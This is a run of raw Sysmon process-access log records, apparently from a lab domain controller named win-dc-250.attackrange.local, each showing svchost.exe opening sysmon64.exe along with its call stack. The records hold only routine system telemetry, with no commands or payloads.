l+51791 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 